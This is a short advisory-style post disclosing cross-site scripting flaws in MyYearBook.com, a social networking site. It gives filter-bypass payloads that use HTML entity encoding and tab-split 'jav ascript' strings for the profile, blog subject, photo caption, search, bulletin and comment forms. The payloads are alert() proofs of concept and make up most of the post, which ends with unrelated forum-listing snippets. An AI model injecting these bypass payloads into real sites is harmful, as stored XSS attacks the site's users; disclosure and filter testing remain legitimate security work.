MyYearBook.com - XSS



MyYearBook.com - Personal community site like myspace.com

Effected files:

Input forms of:

editing profile
posting a blog
search boxes
posting a bulletin
posting a comment

---------------------------

XSS Vulnerabilities proof of concept:

When editing your profile, it seems <script> tags are filtered to <notallowed> tags, and javascript is filtered to the word not allowed. To by pass this we can convert the script tags or the word javascript by using hex encoding. Below are following examples of places where user submitted data isn't properlly filtered before being dynamically generated.


Profile input:

All the user has to do is put the following in any input box in his profile: <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Blog subject input:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Photo caption input:

Same as above.
<IMG SRC="jav&#x09;ascript:alert('XSS');">


Any search box input:

"><IMG SRC="jav&#x09;ascript:alert('XSS');"><"

Posting a bulletin input:

In the message input box the following works:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Posting a comment:

<IMG SRC="jav ascript:alert('XSS');">

Make sure tab is enabled.

------------------------------------------------

Luny - http://www.youfucktard.com



Relevant Pages

  • Re: Insulin-Mast
    ... Dein Posting hat mich grad ziemlich getroffen, ... und dabei die beabsichtigte Aussage und Intention glatt ... Posting spintan nicken mussten, lest bis zum Ende, ich hoffe ich habe mich ... ich dachte es kommt deutlich genug rüber was ich im Blog ...
    (de.sci.medizin.diabetes)
  • Re: 2008 AD restore
    ... BLOG --> http://blogs.dirteam.com/blogs/jorge/default.aspx ... * This posting is provided "AS IS" with no warranties and confers no rights! ... Always test ANY suggestion in a test environment before implementing! ... if you at any point in time are able to DISABLE inbound AD replication on a DC BEFORE the tombstone reaches that DC, then you can do an auth restore without the non-auth restore ...
    (microsoft.public.windows.server.active_directory)
  • Re: profilepath - User Profile
    ... BLOG --> http://blogs.dirteam.com/blogs/jorge/default.aspx ... * This posting is provided "AS IS" with no warranties and confers no rights! ... "Jorge Silva" wrote in message ... roaming profiles and you can also have polices that exclude some folders from local vs. roaming profile. ...
    (microsoft.public.windows.server.active_directory)
  • Re: profilepath - User Profile
    ... BLOG --> http://blogs.dirteam.com/blogs/jorge/default.aspx ... * This posting is provided "AS IS" with no warranties and confers no rights! ... roaming profiles and you can also have polices that exclude some folders from local vs. roaming profile. ...
    (microsoft.public.windows.server.active_directory)
  • Re: Restrict users to logon on the particular computer
    ... BLOG --> http://blogs.dirteam.com/blogs/jorge/default.aspx ... This posting is provided "AS IS" with no warranties, and confers no rights. ...
    (microsoft.public.win2000.active_directory)